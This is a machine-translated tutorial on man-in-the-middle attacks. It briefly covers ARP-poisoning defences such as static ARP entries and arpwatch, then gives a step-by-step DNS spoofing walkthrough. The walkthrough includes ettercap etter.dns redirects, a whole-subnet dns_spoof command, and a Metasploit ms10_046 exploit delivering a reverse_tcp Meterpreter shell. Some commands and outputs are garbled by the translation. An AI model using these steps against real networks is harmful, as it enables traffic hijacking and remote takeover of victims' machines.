Man-in-the-middle attack-DNS Spoofing

Source: Internet
Author: User
Tags mac vendor dns spoofing

In the previous article (man-in-the-middle attack ARP poisoning), we discussed dangerous hacker attacks and practical ARP poisoning principles. In this article, I will first discuss how to detect and prevent ARP poisoning (or ARP spoofing) attacks, and then I will review other man-in-the-middle attacks-DNS spoofing.
ARP cache attacks are very dangerous. It is important to create security awareness and analyze effective tools and policies among users. If you operate on a small network, it is easy to maintain ARP. However, it is difficult and troublesome to maintain ARP on a large network. At the end of the previous article, we discussed tools and technologies that can be used to detect ARP cache poisoning attacks. Let's review each step:
Static ARP
You can manually add some information in the network ARP table. Once the information is inserted, you have a static ARP ing. The process of inputting data is also very simple. In your terminal/CMS, you only need to enter "arp-s"
Example:
Your current ARP table:
Root @ bt :~ # Arp
Address HWtype HWaddress Flags Mask Iface
192.168.1.1 ether 00: 22: 93: cf: eb: 6d C eth0
Let's assume that I want to add a new host in my ARP cache table. I enter the following command:
Arp-s IP MAC
Root @ bt :~ # Arp-s 192.168.1.2 00: 50: FC: A8: 36: F5
Root @ bt :~ # Arp
Address HWtype HWaddress Flags Mask Iface
192.168.1.2 ether 00: 50: fc: a8: 36: f 5 CM eth0
192.168.1.1 ether 00: 22: 93: cf: eb: 6d C eth0
Root @ bt :~ #
Note that manually adding ARP tables only applies to the current session. When you restart the computer, the table is updated. If you want to use this method, you can create a batch file/BASH file and add them to the startup Item.
ARPwatch
(Ps: Listen for ARP Records)
This is a good utility that has been used to monitor ARP networks. It can detect and record the changed networks, and also sends emails to describe their respective changes. The installation process is also very simple.
For Ubuntu users:
# Apt-get install arpwatch
Root @ bt :~ # Arpwatch-h
Version 2.1a15
Usage: arpwatch [-dN] [-f datafile] [-I interface] [-n net [/width] [-r file] [-s sendmail_path] [-p] [- a] [-m addr] [-u username] [-R seconds] [-Q] [-z ignorenet/ignoremask]
To perform quick detection, run the following command:
# Arpwatch-I interface
Root @ bt :~ # Arpwatch-I eth0
Check whether the program is running:
Root @ bt :~ # Ps-ef | grep arpwatch
Arpwatch 1041 1 0? 00:00:00/usr/sbin/arpwatch-u arpwatch-N-p
Root 2191 2165 0 00:00:00 pts/0 grep-color = auto arpwatch
The next step is to record the log in ARPwatch, which is also very simple. You only need to determine the Directory and then read the file.
Oot @ bt :~ # Cd/var/lib/arpwatch
Root @ bt:/var/lib/arpwatch # ls
Arp. dat arp. dat-
Root @ bt:/var/lib/arpwatch # cat arp. dat
00: 50: fc: a8: 36: f5 192.168.1.2 1337437776 eth0
00: 27: 0e: 21: a6: 1e 192.168.1.5 1337437923 eth0
Therefore, if you are a network administrator, you should implement some policies to monitor ARP tables and protect hosts from ARP poisoning attacks.
Of course, we should note that man-in-the-middle attacks are not limited to ARP spoofing attacks. As mentioned above, many other technologies can execute a man-in-the-middle attack. A major example is DNS Spoofing. We will analyze it.
DNS Spoofing Attacks
DNS Spoofing is a very dangerous man-in-the-middle attack that attackers can exploit to steal users' confidential information. Although this article provides some new insights, it is important that DNS Spoofing is a general concept. There are several ways to implement a DNS spoofing attack.
In a DNS Spoofing Attack, attackers can exploit this vulnerability to forge network traffic. Therefore, to understand DNS spoofing attacks, you must understand how DNS works.
DNS (Domain Name System) is a very important protocol on the Internet. It belongs to TCP/IP and is a hierarchical distributed module that contains information about domain names. It maps domain names to their respective IP addresses on the network. DNS locates hosts/servers by viewing the friendly domain name, and uses the Domain Name System. DNS maps the domain name and IP address to each other. These devices (routers, servers, etc.) are connected to your computer and cannot understand some friendly names (infosecinstitute.com). They only know one IP address, while DNS is responsible for translating it.
Let's take a look at the figure below to understand the normal communication between the host and the local DNS server.
 
The DNS server contains a primary database, including the IP address of the information, because this involves the corresponding domain name. Therefore, in these normal communications, a host sends a request to the server, and then the server responds to the correct information. If the DNS does not have an incoming request, it sends the request to the external DNS server to obtain the correct response.
So how can attackers use man-in-the-middle attacks to implement DNS spoofing? Explain the answer:

Attackers use DNS to spoof man-in-the-middle attacks and intercept sessions and transfer them to a fake website. If you want to access google.com and Google's IP address is 173.194.35.37, attackers can use DNS spoofing technology to intercept sessions and redirect users to fake websites, the IP address of a fake website can be any IP address.
Demonstrate DNS Spoofing Attacks
In previous articles in this series, I found that ettercap is a good tool to demonstrate ARP spoofing attacks. Of course, ettercap contains a DNS plug-in, which is very easy to use.
 
Open ettercap GUI, click "sniff", and then "uniied sniffing" to select your network. Host s on a single machine, and then scan the active hosts of the entire subnet. During execution, we edit the etter. dns file to ensure that it executes the correct DNS Spoofing Attack:
 
Microsoft sucks
# Redirect it to www.linux.org
#
Freebuf.com A 192.182.196.56
* .Freebuf.com A 192.182.196.56
Www.2cto.com PTR 192.182.196.56 # Wildcards in PTR are not allowed
By default, ettercap is the IP address redirected to another website. Let's change it:
Freebuf.com A 192.168.1.12
* .Freebuf.com A 192.168.1.12
Www.2cto.com
PTR 192.168.1.12 # Wildcards in PTR are not allowed
192.168.1.12 is the attacker's IP address. Make sure that the Web server runs on the attacker's machine and must enable IP forwarding. View on the victim's computer:
C: \> ping www.2cto.com
Pinging microsoft.com [65.55.58.201] with 32 bytes of data:
Reply from 65.55.58.20: bytes = 32 time = 167 ms TTL = 54
> Reply from 65.55.58.20: bytes = 32 time = 167 ms TTL = 54
Reply from 65.55.58.20: bytes = 32 time = 167 ms TTL = 54
Ping statistics for 65.55.58.20
Packets: Sent = 4, stored ED = 4, Lost = 0 <0% loss>,
On the ettercap GUI, select the victim host (destination 1) and default router (gateway, destination 2 ).
 


Click Mitm-ARP configuroning, select "Sniff remote connerctions.", and then click "start"-"start sniffing"
 
Click plugins-manage the plugins to select dns_spoof. This will enable the dns_spoof plug-in to execute DNS Spoofing man-in-the-middle attacks. The DNS Spoofing Attack on the victim's computer is:
 
As you can see, when DNS has been successfully spoofed, all sessions are transferred to the attacker's host, rather than the real Microsoft Server.
This demo is based on the ettercap GUI. You can also use the command line version. Let's consider a command line interface that quickly demonstrates DNS spoofing.
Select etter. View Dns using simple commands:
Root @ bt :~ # Locate etter. dns
/Usr/local/share/videojak/etter. dns
/Usr/share/ettercap/etter. dns
Root @ bt :~ #
Now you can use your favorite text editor to edit this file. You can use the text editor nano or whatever you want
Root @ bt :~ # Gedit/usr/share/ettercap/etter. dns
Root @ bt :~ # Nano/usr/share/ettercap/etter. dns
Now you are ready to save the file. We need to enable DNS spoofing attacks through ettercap:
Root @ bt :~ # Ettercap-T-q-P dns_spoof-M arp ////
Ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0. .. (Ethernet)
Eth0-> 00: 1C: 23: 42: 8D: 04 192.168.1.12 255.255.255.0
SSL dissection needs a valid 'redir _ command_on 'script in the etter. conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* | ===================================================== ============>| 100.00%
4 hosts added to the hosts list...
ARP attack oning victims:
GROUP 1: ANY (all the hosts in the list)
GROUP 2: ANY (all the hosts in the list)
Starting uniied sniffing...
Text only Interface activated...
Hit 'H' for inline help
Activating dns_spoof plugin...
Let's split the command structure to analyze the commands used for DNS Spoofing Attacks:
-P: Use the plug-in. Here we use dns_spoof.
-T use a text-based interface
-Q: Start quiet mode (meaning not to echo)
-M starts ARP spoofing attacks
//// Indicates spoofing the entire subnet Network
In addition, we can use these commands comprehensively. For example, if you want to cheat a specific victim host, you can use the IP address of the victim to perform DNS spoofing attacks.
Root @ bt :~ # Ettercap-T-q-P dns_spoof-M arp ////
Ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0. .. (Ethernet)
Eth0-> 00: 1C: 23: 42: 8D: 04 192.168.1.12 255.255.255.0
SSL dissection needs a valid 'redir _ command_on 'script in the etter. conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* | ===================================================== ============>| 100.00%
4 hosts added to the hosts list...
ARP attack oning victims:
GROUP 1: ANY (all the hosts in the list)
GROUP 2: ANY (all the hosts in the list)
Starting uniied sniffing...
Text only Interface activated...
Hit 'H' for inline help
Activating dns_spoof plugin...
In another example, you can use a specific interface to perform dns spoofing attacks. To do this, run the following command:
Root @ bt :~ # Ettercap-T-q-I eth0-P dns_spoof-M arp ////
DNS Spoofing is a very dangerous attack because attackers can use the dns_spoof plug-in of ettercap and other tools to perform attacks. In the end, attackers can use a social engineering Toolkit (SET here) to execute attacks to control the victim's computer. Imagine how easy it is. With the social engineering toolkit and DNS spoofing technology, you need to configure your social engineering toolkit and your IP address list, make a website like Google to spoof the domain name to your IP address. When the victim opens google, your attack will allow it to access your IP address, and then establish a remote session.
Let's consider an example scenario: the metasploit penetration tool uses ettercap for dns spoofing. Select the exploit you want. In payload, select reverse_tcp:
Root @ bt :~ # Msfconsole
O 8 o
8 8 8
OoYoYo... oPYo. o8P. oPYo... oPYo. 8. oPYo. o8 o8P
8 '8 8 8 oooo8 8. oooo8 Yb .. 8 8 8 8 8 8 8 8
8 8 8. 8 8 8 'yb. 8 8 8 8 8 8
8 8 8 'yoo' 8 'yoop8' YooP '8yoop '8 'yoop '8 8
.. :.. :.. :..... :::.. ::..... ::.....: 8 ..... :.. :..... ::.. ::..:
::::: ::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::
= [Metasploit v3.7.0-release [core: 3.7 api: 1.0]
+ -- = [684 exploits-355 auxiliary
+ -- = [217 payloads-27 encoders-8 nops

Msf> use windows/browser/ms10_046_shortcut_icon_dllloader
Msf exploit (ms10_046_shortcut_icon_dllloader)> set SRVHOST 192.168.1.12
SRVHOST => 192.168.1.12
Msf exploit (ms10_046_shortcut_icon_dllloader)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
Msf exploit (ms10_046_shortcut_icon_dllloader)> set LHOST 192.168.1.12
LHOST => 192.168.1.12
Msf exploit (ms10_046_shortcut_icon_dllloader)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.12: 4444
[*]
[*] Send vulnerable clients to \ www.2cto.com \ bqokoWwx \.
[*] Or, get clients to save and render the icon of http: // <your host>/<anything>. lnk
[*]
[*] Using URL: http: // 192.168.1.12: 80/
[*] Server started.
If everything is normal, all we need to do is to configure the etter file according to our DNS. See the figure below: I use the attacker's IP address to set it as the target website. Once the victim opens the website, he will be redirected to 192.168.1.12 and the session starts.
 












 
These are only one of the most dangerous aspects of DNS Spoofing: the victim does not know what is sent, because everything seems reasonable, but unfortunately the data is not transmitted correctly. In addition, this attack is very dangerous because attackers may use this technology to intrude into other computers on public Wi-Fi points. I hope this article has discussed a useful policy to detect ARP spoofing attacks and DNS spoofing attacks.
====================
I have read a lot of dark articles from abroad and found that they write articles very well. I should study them well in China.

Translated by Heee from a foreign website from: FreebuF. COM

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.